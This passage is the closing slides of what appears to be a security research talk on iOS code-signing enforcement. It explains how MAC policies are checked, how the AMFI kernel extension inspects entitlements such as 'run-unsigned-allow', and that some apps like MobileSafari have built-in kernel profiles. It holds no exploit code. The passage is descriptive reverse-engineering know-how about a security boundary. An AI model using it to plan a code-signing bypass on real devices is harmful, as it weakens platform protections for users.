  • 67. How it works in our case MAC policies list is iterated and it retrieves a function pointer inside the policy structure The function it’s called and it performs its checks If *any* of the functions fails at granting the permission code signing is not disabled
  • 68. The mysterious functions So far it appears that only AMFI(Apple Mobile File Integrity) kext registers a function It checks if a process has one of the following entitlements: get-task-allow run-invalid-allow run-unsigned-allow
  • 70. When AMFI registers the MAC policy It appears that as soon as a process is created AMFI registers a MAC policy with information taken from seatbelt profile and entitlements Some applications have builtin profiles in the kernel most notably: MobileSafari MobileMail
  • 71. How does the story continue?
  • 72. Join us and Dino at the workshop!
  • 73. Questions? Contact us at cmiller@securityevaluators.com vincenzo.iozzo@zynamics.com